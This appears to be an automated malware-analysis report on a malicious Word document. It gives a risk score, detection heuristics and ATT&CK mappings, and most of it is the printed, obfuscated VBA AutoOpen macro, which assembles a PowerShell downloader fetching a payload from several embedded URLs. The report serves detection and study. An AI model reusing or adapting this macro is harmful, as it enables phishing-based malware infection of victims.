MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute obfuscated code that attempts to download a payload from the reconstructed URL "https://www.blueyachtchart.com/c3y". The presence of the 'Shell' call heuristic and the ClamAV detection further indicate malicious intent, likely for initial access via spearphishing.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
oSIoaBnfi = JMsNJjW - crwouwXpskiF / (7654742 + TGDvVJTil - 1846493 + ilDswKc) Shell EAAjHZChQv, 0 aQGFwzYMR = ICBdNvtmKOKM - zFonPKUzw / (5012134 + iXHOHDX - 1728457 + jViIXRpJGlwRN) -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "HVpFnmFF" Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24155 bytes |
SHA-256: b2aacc79f4f58cbcd8712be2d2491e5c9881442a1c7d4dfeb9674dee83d6e0fa |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
942 of 1224 identifiers look randomly generated (e.g. 'zKmwJwaldufaJHJPzfkBGjsbD4GFiD4Gc3y'); 14 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HVpFnmFF"
Sub AutoOpen()
On Error Resume Next
ITSEREIbU = jociVzYGDtRWLw - OBYkOqfCo / (4327992 + TflPnTZwjXXbZw - 3432356 + kQFlITqCCkr)
FFAmnHXjs = nFzwPPqraw - wPulikpAojND / (5464573 + qikjTBSZGw - 2012786 + osDAKclG)
JqGAFWifD = aBUdYhFIHwSX - wbavwwoY / (7108269 + WKAckdwTn - 4314882 + WInLUWvCUo)
Application.Run "wrTPYEmLACm", LuQPFKHUKuJWn
oljHZiblj = MpjwSXEVi - diAobSnk / (5509176 + sWQiiYTUKz - 4102829 + EHHjZotwRaXJ)
LJlsfGrqI = WqZEQtDk - fpuatjvt / (9707223 + jISwGTYnboEHi - 5047038 + kRHUXAshPsTQir)
End Sub
Function LuQPFKHUKuJWn()
On Error Resume Next
sSSljX = ZGNMHXmkwJQj - VzXdkHotKdm / (8097865 + TqzzVofVGiJi - 4190318 + EKLNZsvIDQ)
sRpQiZRQTE = NHTsPcb - aDvkzocEFO / (2782639 + uPjjiwQMz - 7142596 + mjvIjMcr)
NtEdSM = iLvUJaM - wnptpCIwYk / (2044628 + LOYpsJBDf - 9314745 + dXIfjUOZImrQK)
CRttwbip = rvJWqbXiAnjwPH + Mid(("IpPRiF hWGODR+[CHAR]78),[CHAR]39 -CrEplacE'AVT',[CHAR]36)) drFjNUXi"), 14, 47)
qBkrHCvL = YJtzvMWhWZiJKC - TzOuaLUPVoQ / (2260995 + NLvOmZjdwQOivQ - 1903187 + fwRPwaVYL)
XpYbzw = nEtXLfA - TKdPXkTAVh / (71529 + fvKBqpww - 75907 + qXDkmfkbEiiW)
DYHstiBYkIq = wkQahwwFoYzWst - hVhEYhUGLmwnQ / (8904430 + RcJzLQZOQAE - 6347379 + zDOtmst)
GjiDiVc = RzjnJIbRauTnFc + Mid(("rwSJUfiLBMlupXyNSBc3y+c3y + '+'65N+65bKuMwmUIwjNspnirmjZiqjwL"), 15, 23)
YOurhLhdO = GWMshbHG - DUASGIXEB / (4645320 + tQwLkhl - 4141917 + hsYVqsjBAEQ)
tnhbv = ckacOMXwQiGH - SpYBIAql / (6171024 + LvibObVDzHNR - 6176729 + iVVNZKDlRL)
ZcwoZT = DIAsEaAwCP - kkJUuaJzwBJA / (3540033 + icMVfaiTEKSV - 2222101 + hNVdIBllEEQcb)
UTLISFMZB = BizOiiEojIfL + Mid(("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj"), 25, 82)
jGvPnz = WpCQjzBYPRS - jfsQBtYHFDwN / (957732 + QKmGSjYuHTzV - 963453 + CrMKwiq)
lwUnalqV = PREjZjVTq - LwiqmJwiKlYYR / (6190448 + TENqnOarBuVCm - 1974944 + YncKJGWLFDMQU)
NvbcmD = qrAXrGc - dDalHjwQ / (1306413 + YSMkwHWi - 9425800 + ImawGmLDViuEQ)
nnEGnkwn = OWuHiFZzo + Mid((" PsfGWjkRIHM[ChAR]70+[Chc3y+c3yAR]105+[ChAR]11665N+65N),'+'[ChAR]39c3y+c3y 65N+65N-CrepLaCE Dc3y+c3y4Ge5tD4G,['+'ChAR]965N+65N2 -rePlACeD4IhzSSzRuqdTBzjKvtHWZEtUoP"), 13, 128)
siLcdaTwj = sBsFvsA - JjzqccfV / (4173864 + vcSUBvaXXzjHc - 3770453 + aFEuFIcdkvjRU)
wCIcmERUOT = HsdTXtUiYzwfXV - aBGjABW / (5233407 + QjTwhYUiGbP - 1304258 + nFaVshEz)
UbwvbLtni = kGbKtakTul - BDnaVAzfR / (4861489 + GuTNBFiIoWdqwM - 4421879 + futmjdpEkR)
OqWCQw = KYkXwpPow + Mid(("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ"), 4, 97)
lmMbdRBd = jrfZfpl - uYNoNwdUkYnPcF / (2855993 + jFiQGzzpKMq - 6131709 + VOzvjvjXdmBOOo)
cfXlGKmt = NZXbcCqZ - UqwaXiBI / (9585328 + PJpTvJiGFS - 5761478 + rJpckoO)
cDtKt = ziomaqw - zwksQtZ / (9657167 + FbRtvkHjSz - 7588201 + vtNtuXkVDsFK)
XhwZwRV = zsiZjAo + Mid(("MSOJovRbOpGfClivXfG65N+6'+'5NOxND4G,[ChAR]96 -c3Sqv"), 19, 31)
rinjwcFX = KBuhGIrLTEFXwW - odUMWGQpdZ / (8992658 + BDuqOAwjVqnw - 7067200 + zJBBKmPav)
NvhzI = jSqqtMQIL - pHZOqXCmBwp / (4670625 + HHGncPHRaIf - 1326203 + JFqIZfkJYrjnLm)
vNAjSvVr = cZwYLqjjnZot - JPztHtO / (9320885 + sYKnSiPWzQcXpA - 2249325 + vGZWCjkm)
pkkRTOTtYGB = GGhllzjrEiM + Mid(("WsqdYMUDAiRXnzsTvbQzzzJ"), 12, 1)
zuHYMNRb = XATQZXQjUP - mLmoatIoXHSZX / (6307626 + zEjJTntXj - 4826045 + mJMWAfu)
BfsdjfqbPPi = DUijNmY - qQEawjGYLwLv / (9954690 + oDPXHwbBGnfSd - 9682711 + VVWuECHiwF)
cCpQfh = DoKDUwE - jbTpiaIo / (1869923 + vdGIDpboB - 9106968 + jYRSFvmqDThOT)
wsmwIODnSPP = zJsqjRXojhXO + Mid(("fswzbCWbsFniuRSSKJ4U/uzLLsjuTNPwGSCJAwkK"), 19, 3)
sBmhFfN = cwulVbf - JTzCBXZiVzGzNP / (7569032 + JmvwizcjLOpJA - 302298 + bnlEzSrAHS)
izocd = aQrPpMIEbijjO - qQrniQiT / (5473702 + KcKnYSmodtY - 2332692 + vZdAvamvEXuIC)
ASRHq = NZCKHoM - NBVfIws / (1189591 + miXvOEPitq - 6735573 + FQiWSZO)
njEcVMJE = tCfsTwOzN + Mid(("bwfLsWukfs'+'OxD4G+D4G65N+65NNi65N+65NOD4G+D4GxD4G+D4GNNDc3y+c3y4G+D4GgTZm(), xc3y+c3y2D4G+D465N+65NG0SDCD4G+D4c3y+c3yG'+'avpPQUQhkqTQkKQLq"), 11, 112)
wHQMkfhQ = zCIiiEw - mbNzdzIlqJ / (8153929 + dfmUGsFCdk - 3570764 + AfICIArOato)
iHhKZ = DaBqEqpG - RZSPnXmwwrC / (1757461 + zwqFdpRczkrf - 3284795 + qOwnvMBiGpn)
ZLmtHMp = cFPdCmzScD - wMzpwUp / (5266334 + WrwjwDGzjOrA - 3472789 + NLMUhFhw)
VCnzjX = iRYfqMbfQRp + Mid(("zKmwJwaldufaJHJPzfkBGjsbD4GFiD4Gc3y+c3y+65N+65N'+'D4GteFit);D4G+D4GforeD465N+65NG+D4GHhrcSAzFQ"), 25, 61)
wiqjHKrBFP = QOCwlJjfw - AiOMzjEldmA / (1538682 + DXoJUzdKah - 93505 + mPJcCfoiZjP)
qsZjswBRvNi = aPSVKtPNIswaw - LfVVaBNkMRvJaG / (2203933 + wXIzjFjHzj - 3339899 + SuRifCUJMEFN)
QiqnjlTR = pCBaBTJCjvb - zPGwOVukb / (3547618 + zMiXmCMsR - 8981690 + uCfjwNIkjz)
BNhaC = mOzawXC + Mid(("swwlLnQRPaZJ4Gt/oD4G+D4Gc65N+65N3y+c3yMgoD4G+D4GZ/Fit.SpD4G+D4Glit(FitJTDTpHArdWzYwOrMXPBM"), 13, 58)
RjuOu = XvWzWCJXa - DTiXhcqjTJ / (9093013 + lYsOJGRXXRiRbR - 7186775 + MwjtHRKqPLdB)
uPbFmi = nRrTaKwH - sCGCwloR / (9240633 + qGWWdCpTN - 236258 + wdPNjAmzAHmcED)
WECnFb = mETYCzPNKDR - ORkqkGHuZqpOlB / (3846479 + HDdRTzPlApzCjP - 1013532 + SFYfQRBV)
wLWzEafrJR = QhmOKziKdAWkB + Mid(("jLQJVy+c3yD4G+D65N+65'+'N4Gt)D4G+D4G(x2D4G+D'+'4'+'G0SD4G+D4GDC);break;}cat'+'D65N+65N4c3y65N+65N+c3yG+D4Gch{}}D4G) -r65N+65NePlACe (jPBds"), 6, 128)
cVRzm = CzpvHFLJl - vjdoiqCHUKu / (3554018 + wCwYPJwlTd - 1950811 + QbGOrzvLkIG)
UWYrzvtz = ppPERiRUkd - tIhwzmscCSKOO / (9211569 + dMzHlnvbjZuuU - 7825834 + qtniMFKB)
iiNmJn = ZsjDEibAIXBFVd - FzjwWEsYnqcRa / (6121512 + nTKDitGsXEwt - 7224388 + nGUQwcPZLfrjTt)
TJFDpVnln = JEwPEmAdUFGZzb + Mid(("EzFjbdbXhNqoXzVdazrwL3yD4'+'G7/?D4G+D4Ghttps://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y'+'+c3yDD4G+D4c65N+65N3y+c3yGIj65N+'+'65Nc3y+c3y'+'D4G+D4GVtHfFGNwIjpIUjwO"), 22, 148)
IWrBX = vwzFItXKG - AkIAiCTOHfL / (249015 + NfwqwZLMFM - 532499 + wdKQSHjZst)
SnGMjwwVsQV = SMWRGWaOGtY - ZLDZluOuXFfj / (4858955 + zpYfbhUC - 5766605 + bHFqfwwbZrk)
TYPXqTjGGt = OiufdwF - hqswYlqaS / (8365631 + XhZzipXPZ - 1700045 + GhYsapl)
JOSbqWN = bNAUZkhu + Mid(("zfEPDzaaanvITKlsN4G+D4G'+'U.TZmDoOxNWD4c365N+65Ny+c3yG+D4GnlOD4G+D4GxNOadD4G+D4G'+'FIOD4G+65N+65ND4GxNl'+'eD4c3y+c3y65N+65NG+D4GTD4G65N+65N+DAOoESQRkw"), 18, 124)
AukVpNKNhIm = MXokPqFjjEd - LYjKApWovaRd / (2261171 + jGVRnuYGL - 4057198 + EVGzmQLSCDkl)
uSptZzXQ = HjmtfmFLZAJz - ORiKEMLZv / (3935835 + rIJFKJMvU - 7365874 + GHfbZPaf)
IzbNACsdYC = wzZCtkrwYa - LLWCWdAB / (3015759 + OfbEKafdnwzPz - 3875868 + iHLaRNWucwulcE)
fVcnSWVc = DVzQwlOIRtHVJh + Mid(("GOjchaXduhkuJcCK?D4G+D4GFit);D'+'4G+D4GxD4G+D4G20SDC ='+' xD4G+D4G2'+'0en'+'v:publiD4G+65'+'N+65ND4GcD4G65N+65N+D4G65N+65N +D4G+D4G Fite5tGiFkGLobfhaO"), 17, 122)
MEbhNL = vMCInWoa - ZrkzGPpCYrhZzR / (7412567 + kJcQFslQQCi - 6664723 + QZawSIqhzr)
QoMGrZJ = UJzuwlwuP - DMLKshGUiDhG / (6700699 + RGbhJwul - 3586828 + wvuqTfGn)
cJpZLNzdbwz = mNNOnZajM - nlNapcqJO / (7161288 + mRtCNzmPA - 437683 + towuEsnIiMhUiX)
ujSmXfktG = PZQhhSwzjJMVli + Mid(("PiliojjaNSUcZlp+65ND4Gd D4G+65N+65ND4c3y+c3yG= &D465N+65NG+D4G(FitnFit+FiteFD'+'4G+D4'+'G'+'itD4G65N+65N+D4G+FiD4G+D4Gtw-objecFit65N+65N+D65N+65'+'N4G+D4GFittFD4G+D4GitD4G+D4G)6OiuzWfilQRiwlZ"), 16, 162)
rBcGlqkVc = boULOqsYivY - VGCGEzOiichBXf / (988116 + owzkjNjusWFof - 2030766 + JpfAlAsvwEhvz)
DKCvnzKD = ToilBjiz - RHZHOirazTnXL / (8574392 + TqwAwfzRhnZ - 6534463 + CiaGMCNsLs)
BCFYT = MHiicLjHvDR - niwISqsU / (7843336 + UXUtjLJ - 6005440 + HwRorAQpVERm)
zNazjQFQRPP = UFOdWrCzAwTL + Mid(("daVda'+'65N+65ND4G+D4Gc3y+c3y.co'+'m/rL7zkD465N+65NG+D4Gpac3y+'+'c3yD4G+D4G/D4G+D4G?hdCUZuF"), 5, 81)
SatWqDnzJ = pLmHNjfXwQ - KLVtHHBAW / (3107688 + OCmAFHwPkj - 7709007 + ccEtDGpjSWA)
uuKqMISpHYf = IRfGmsBwHSz - UMdYZjfiWktQ / (505949 + wuhjErBLs - 7786840 + scrhrTJfTYq)
tQXOcIZm = QGjqSEXXODZ - HPXNFjIUowhGnB / (5952124 + klioHRQdU - 233033 + HUQNoCzabvva)
tIwWJCXGOj = kUnYNuuCT + Mid(("faVdSRLzy'+'+c3yCrepLaCE([ChAR]120+c3y+c3y[c3y'+'+c3yChAR]50+[c3y+c65N+65N3yChAR]c3y+c3y48),[ChAR]3c3y+ccHuj"), 9, 96)
BUHbCnWbfQF = kmpzutEABz - jtEpaDVoLw / (4789213 + dwEswSiOdkTS - 2139592 + cACWkOWQkfYN)
zblwZfNo = WkzRWLBLDqAGi - lvwZliqbU / (7252085 + NKONLYTkbMddS - 9419989 + JYYKBQB)
fUsqujzKHjz = lUlGmizuPNcIBn - rSjVGHHRfcfVRC / (2026263 + YLPcsZShCcRN - 3066476 + oFWahsVuvniDG)
htcsAtzqr = PWoTYcDRZGnc + Mid(("zsBkFuvIhqjiOjO.nAmE[65N+65N3,11,2]-jOinD4GD4'+'G) ( ((D4G65N+65Nx20nsadD4G+D4c3y+c3yGasD4Gc3y+c3y+c3'+'y+'+'c3y65NdXcwZUjnQSiPMOFVHnu"), 16, 100)
ImSThWHFdI = AzTdptBpo - wrVSOdQbwpT / (7777387 + ouYImmrTLUP - 8469617 + bRzkBQpjPq)
YPltNRNQCb = mPajKMQwLZ - jRlPDzHmXFa / (8725349 + wdOnDzt - 4881524 + BVWLKJz)
qlsCBHawAHV = Rjvwijz - MsZcTRMVXijw / (5632052 + MjFiPPsrmwmSot - 9548672 + PwOAqHU)
kAwOZSlAi = HNhsFdEwlKF + Mid(("ASOzJoCOwMTzOHtmN'+'(FitD4G+D4G.D4G+D4GexFit+D4GSfP"), 17, 32)
XpTwphNf = jtUFbpAcS - SSjjcEFLIt / (6058965 + rDKVlsS - 5001001 + OMffGVBtHkHq)
qwuNDKDiNM = VJtSwROEiJl - CRuFEIJsqDF / (813517 + VjDSBIX - 3009083 + hBcTuBLdj)
VaTPrbju = tBEEHnD - zwmSDoNciLl / (6427845 + NNnjtdl - 2690819 + hMXCKCRi)
zfSpmOv = lkJBnbcBaVTPrD + Mid(("HITMSulIdXnkJqUzCD4G+D4GX 65N+65N= Fit D4G+D4G D'+'4G+D4Ghttp:/c3y+c3y/sofDc3y+c3y4G+D4GteD4G+D4GdgebdD4G+65N+'+'65ND4G.com/D4G+D4G687c3y+c3yyc/D4G+D4G?h65N+65NttpD4G+D4G://dD4G+D4GulfacolD4G+D65N+65N4GltD4G+'+'D4GdqmGjYI"), 17, 199)
uJwDwLSToZz = CfnQVOKROpRauA - LLDPHjUnwLT / (9147234 + jwojUYAiOAJhU - 6179536 + kABUwJtGQ)
oNOYPqKc = lPhrrFBSTlSB - GWAzwKthmDDD / (9231595 + wzhmpYvj - 1845121 + mXuIOAuwi)
SwDRt = vwwJzvXDw - dovvCTmz / (5503244 + pWMhMZQlTlI - 1069154 + jNACXouBrk)
STFcjIhqzpB = iwfaRcPznFRTAs + Mid(("Hlhqs'+'5N'+'+65N raD4G+D4GndD4G+D4GomD4G+D4G;x20YD4c3y'+'+c3yG'+'+D4GYU = .(FitneFit+pzsPRdQwhMvn"), 6, 81)
KIChkGDWQd = XfmkNDXTPiCRPK - cwmOrNwRfYXO / (6887999 + FoNnZRPPG - 4501487 + RfLQCdwknccmXX)
vfnjAOG = ZOGMpooDJtod - tTNrPUZimAcuZ / (5769393 + mdCqPqrBIuiFdc - 486189 + OAIqUPkXDw)
ElAZrwLc = nNdRPKr - fqwNzCSEz / (6322091 + vFjcOuRnb - 4486098 + fnRoDnicSumLW)
ULFBPWQR = pwbwFuNuVFaYmP + Mid(("rzK);&(65N+65NFitInvoFiD4G+D4Gt+FitkFD4G+D4Git+FiD4G+Dc3y+c3'+'y4GteD4G+D4G-ItemFic3lLJfKNaUbuAcHG"), 4, 81)
FWWFprt = PXwXPtnLKvKw - aVOTJuMvwHH / (9893116 + MFowOtzDPF - 3789657 + WSjVFrwpXk)
wziUizicSu = cUtBqoQPq - qjhWLhRwbK / (3077275 + wnbdasQJJBbnMi - 4080937 + IOwpczfmBwuJj)
IhNuuOKLALS = waChYFZNOXzhN - EuKhMZqNLaRwH / (7948308 + bwGcTFBkfFP - 3411034 + zbqvlrhGoMzGAi)
EaTGW = QmJoCKnqoCvD + Mid(("EYjrzaohqr65N+65N]68+[CHAr]5'+'2+[CH65N+65NAr]71),[CHAr]39)) 65N).REplaCE('+'65Nc3y65N,[S'+'tRIng][CHAr]3'+'9).REplaCE(65N5'+'Ty65N,[StRIn'+'g][CHAr]36) )') -rePlAcE ([CHAR]54+[CHAR]53HpBRDFAmPqQtLoGMhf"), 10, 176)
bhWGiKtdj = uiDKfbw - uNkkVLQI / (4138578 + mIWTWmJPdQhKL - 397122 + rrIiwIkAwFUirt)
NwDBOi = icPAmjhbL - AQwfbkCim / (5814536 + HdYiBIXNCI - 3386755 + NiEuLPOJPz)
hpEPwSwLOrW = vsmUXUSvF - wbwqVlbKO / (1857834 + jukzWqqT - 4629953 + EKQdmOnAsj)
UfkJVqZjM = bPbwklnYs + Mid(("jFiXQzwafnIfbSby+c3'+'yLaCED4GTZmD4G,[ChAc3y+c3yR]34)) c3y) -R65N+65NeplaCe ([CHARzjQNoOmw"), 16, 67)
tkJJmznWN = BnFMwCXAicchur - iNjXoKVau / (4383936 + TpQmAqlVDWKQo - 2325044 + zOGlfLZqX)
HhJwBAnjoI = GFwpjNLpKihkr - mvZouXwvLYK / (1403078 + Jrcuztwuk - 7466240 + XJwbddhPWfz)
EHbEmmrGn = lkwztLuZiYtC - iniquhBIuRkZVR / (6462788 + vkoKHqKDtDipN - 286424 + PwcvqzYbzzarTL)
zLiSXpzOoKG = MGQHFDpdm + Mid(("ojsqORYzzQBqVlhpMURqnJRGoUY4GZm(x20'+'asfc.TZmToStrD4G+D4GbbEhBoZTOvnq"), 28, 31)
zGRcj = zrzMvsSVcsV - rXJqNjwqsSfod / (5889584 + KKDmDMVak - 9702693 + fzApzfYVrLiO)
MZvcLs = JtmmiLKjRZI - ZGRiVwZs / (5413825 + zqCVAQH - 7504055 + jvYcKZiv)
sbIPTTiKw = nBNZsfYZGq - OFWDHtwjJL / (8896876 + iRcOAdHEmAA - 832097 + nZwXwbJQRta)
oHhiri = XuMiinFsqrd + Mid(("rJdCnO'+'?htD4G+D4Gtp65N+65ND465N+65NG+D4G://reviewzaap.Dc3y+c3y65N+65N4G+65N+65ND4Gc3y+c3yazzWQWNEjSIbQkPznEjdjSjIzM"), 7, 87)
mVzjju = PQXvzmiN - ScTTwMN / (6868994 + KMYBpfIqbnOn - 2053702 + DRiGYfK)
ZDqzPXhmcVW = ijWHsAzimYd - PXjObrmI / (2131168 + wQHcPCPGoDZjis - 5855917 + nHtwBpKBkjiU)
izlaLhG = htBTnhGAPku - jkZjisrjt / (761098 + POuJGGrjTvb - 1349821 + XNrKXhYW)
TJENJWHt = VUQdzmNtaj + Mid(("fzrZQubD65N+65N4G+D4Gtt'+'D4G+D4Gp://D'+'4G+D4Gja'+'ti65N+'+'65N.D4G+D4Gcc3y+c3yom.au/kD4G+D'+'4GRD4G+D4GBD4G65N+65N+D4GG65N+65NSD4'+'G+c3y+cjvkuZfGDfwOOoPAC"), 8, 134)
sATpbwPNT = YAuXBbTEdPLUB - MMfHRhYEVopu / (5569259 + qdwlJwmX - 7627322 + VWOQbVF)
FNPWlciFG = mKYYzGUXUUiF - GwHNzSZLCuoY / (5938426 + uSIcAiIISnSj - 8070462 + liSshSOYG)
IsaXT = bCjVjPj - STZELriXZwfUuT / (5527931 + aYbwqMYV - 2267073 + BzCmYCD)
aWOpWTK = hVFkRCoqkkdOlE + Mid(("JbSRNpdP+c3y+c3'+'yFCLKRASinFQMFRAdQwt"), 9, 11)
WbOOav = tmIHaXvLo - JGvDtHqhVnacQ / (5453783 + GQtGAijT - 1770105 + ZwtXirMOQJG)
czAVwu = onLkfpFoQVj - THCEnFd / (7622271 + bTKwKqwNNATA - 5985505 + FvQCrNULDQs)
DozNBSjI = XpHbKjS - MTAnVwJaDVNAo / (5924197 + JWCmaRPQuEGTHF - 7292019 + mhpPluchsDtIh)
ZzZvVF = NWrjSaNKt + Mid(("aUYfkPws'+'PrEFerENce)[1'+',3]+65NX65N-JOIn65N65N) ( (65N. (65'+'N+65N 5Tyenv:COMsPeC[4,15,25]-jOINc3yc3y)'+'( (65N+65N(c3y&((GV D4G*mDr'+'*D4G)kB"), 9, 136)
WPUtDaBblDt = sYzDFjOiCURfaT - PLPuVtWXGirMrb / (2797087 + hhsoRRip - 8653739 + OAZrBcYQc)
QHVZP = iKnBVArUNXWC - NkwhfhzcZBCiV / (9655247 + hOobwhYWt - 8403165 + QaNbVwLMM)
NuGqJarMEfK = DvsjfEJJ - WzCbnwiuEGoN / (925433 + MQWPwfGSJmIdT - 9139564 + TcPNJVSOzacmB)
iwcEjm = rPsswEI + Mid(("uMGqGvOjqatD4G+D4GurD4'+'G+D4GewebsD4G+D65N+65N4GiDc3y+c'+'3'+'y4G+D4Gtes.D4G'+'+D4GneD65N+65N'+'4G+DziHIcHCVwiowQFCIHZzuIhwOu"), 12, 90)
lvZdChc = KdiDqQSJfnCki - AvUtCXoWsE / (2164160 + OPfNPaK - 7589528 + jiSczjQ)
jXiCLkPD = zzWbzsClmQlAol - snCCdRYcaq / (3680471 + QCREqYYtF - 7753318 + OXcccKZnQwF)
GFFYZXf = ovinfbXwkj - liVLucPrTDL / (7590365 + AowSADCSLcc - 1833981 + ksSirriv)
qbpNEzjPbOA = FXtwFjSI + Mid(("ESJCpLmqYQfsd.next(100D4c3y+c3yG+D4G00, 282133);x20ADFMJLUShNjREZQ"), 12, 42)
pjGUb = fFwjiIaGsBhrW - kMTEkJupTU / (8636681 + MZGwBNw - 285569 + duKEmQnNzzTij)
UJCTjP = JKCOcwp - bncwAAuATsVm / (1338661 + JAztHbWXZ - 4411640 + YwowzWFzsTW)
ERXvGuQz = pPmTzdaIuts - CQioOPE / (2794072 + QbEGBUW - 3138467 + OwmYIdVHZtwOl)
DisbR = tGwfKBGlWdHwm + Mid(("kIIBmhRwLKwARAsOHFD4G+D4GitD4G+D4G + D4G+D4Gx20c'+'3y+c3LTNaillZchH"), 18, 39)
OnlkovhNBv = niNvJEsEit - dIFTGqKQr / (6024864 + ASElizHmjiDjqm - 8949210 + ktVhzKYSbiz)
bSSIhDYPn = lEsdtqiurYW - zsJkaYOjMNZWV / (9647058 + pumKzCfAfmZpzE - 25215 + MWdjHAnsCTRP)
UPcrwoGa = iVIvtszEOX - SriwBiPbMbNzs / (2782154 + pHuHfkPcBQRuF - 2346463 + hwzmRQW)
hjGQbPo = EnwjnQicOIV + Mid(("HQWPaiLNtfL . ((gEt-varIABlE '*mdR*').naME[3,11,2]-JoIN'') (((' & ( ([StRIng]AVTveRbosETQ"), 12, 76)
YOLiwNsljz = GrFCOchk - KPLuPzGzZSRDo / (5384296 + LjluBNBIHWrIjO - 335551 + HGftasCAWJjfka)
MVJtBcph = SPKqhrni - JGDXXqZiXYK / (9525891 + iVTikXsi - 4231801 + jPZtWXTCTX)
ljDnIGdiCDZ = kToicjj - HLQJJjp / (4461443 + HQqvniW - 1432813 + wDKDWqaDwBfzHr)
ldfmY = qTDpDwQWPjEDs + Mid(("KFPrrqzvQlLluwMvjLHFD4G+D4GitwFi65'+'N+65Nt+FiD4G+D65'+'N+65N4Gt-D4G+D65N+65N4Gc'+'3y65N+65N+c3yobjectFD4GlBTFlQiAcvBaojcqzaCl"), 20, 87)
BkjlIXE = QuDjJzl - XijjqDpaj / (1030141 + nrEAYiSYVGAh - 6905601 + KnbmtuBQNb)
ILbZiSvB = IcmKXqXLitI - ufwqYQLW / (9347181 + JjQNnpKhXdcXQF - 6261601 + zQdWFdBcj)
QPicHBhW = vDczCFjJ - GuJCiAwWi / (6766424 + PsJKSutZtj - 5888703 + hjuHEXaXrGnaT)
WHUniumfQV = cOMQGQNj + Mid(("MfZJCZVlLrdECcur3y6 -Crepc3VFw"), 17, 11)
LuQPFKHUKuJWn = OTPmrJAVNqRJGc + NuWIGWsJrCuSh + RBVojFKfjrU + ChrW(34) + LGPlbGcW + hjGQbPo + ZzZvVF + htcsAtzqr + ujSmXfktG + STFcjIhqzpB + ldfmY + OqWCQw + qbpNEzjPbOA + zfSpmOv + zNazjQFQRPP + TJENJWHt + TJFDpVnln + pkkRTOTtYGB + wsmwIODnSPP + oHhiri + iwcEjm + BNhaC + fVcnSWVc + DisbR + GjiDiVc + kAwOZSlAi + aWOpWTK + VCnzjX + UTLISFMZB + JOSbqWN + zLiSXpzOoKG + njEcVMJE + ULFBPWQR + wLWzEafrJR + nnEGnkwn + XhwZwRV + tIwWJCXGOj + WHUniumfQV + UfkJVqZjM + EaTGW + CRttwbip
otswDMfIF = qihwDlZHvXor - mqSLlrBw / (2513373 + rGdQISjd - 6844671 + KcCaMDiMTLEhwj)
GIkAuQDkd = psZURpOuE - CJnswiNpfBGJKz / (1966103 + hjiStawjkUdJui - 9459071 + cBdwVsCM)
DOFbMjhbK = HiLmAcLDH - EEvAEwjITNi / (7903863 + WPfUWXEnBwc - 4532887 + wqABlRlYI)
End Function
Attribute VB_Name = "onWKwTlCaQliPC"
Function RBVojFKfjrU()
On Error Resume Next
uafZhO = OHiWMsNldrwmNV - cGXfdwQC / (9590561 + vihBLWi - 1131033 + SzbJUwGzYEcGE)
dVnWwr = jELXsmzzEkRQK - kRVUhVCKBwCj / (4475445 + rwVwqrAzAwlTtV - 8669425 + sDoZOGjHZjnWC)
GGwDhSsm = VMPBFGPTa - jnQWiNchR / (1995613 + zszilON - 4723531 + EdumdZEr)
ndmqHWR = BwbtSLphRvXP + Mid(("4zviCjkf&&set %dfGHU2TZ5i3wkcSuf5kzL"), 9, 12)
mujji = MGGFsJWURT - rBuSOCtdsJ / (1725865 + SiifVWEHuBoM - 200029 + YBcHFnXuvaiLHq)
swrfTB = MUPDVoaKiAwN - apMiRQdr / (200483 + DVNXjIAKONZi - 6533238 + JfJwrwGHaM)
EiUki = FNwtrNqLiL - HQrBdqjzmrHn / (4775159 + GfACfwvBDduE - 3267095 + ziXzNcYtHp)
SPZftYaZ = mbZdVtbqM + Mid(("jbf5zamwzEXfWz5l8I4PCzo"), 6, 2)
jPuJzDXCv = qICPlGMNHZZN - EUHZwNNYKhPZVc / (5289144 + TjIlRsOzwqR - 6266240 + ivrKaVHqBauXK)
JCbKKFjcuL = bnpPilinsQb - LGKaGvjiclXP / (9087608 + TnSFOOHM - 7465636 + IanvKuDb)
CaTjG = sJBjaUzqfDpP - UXRvVmBMazT / (178824 + fHlUiiwjD - 9560406 + HslOYcIwt)
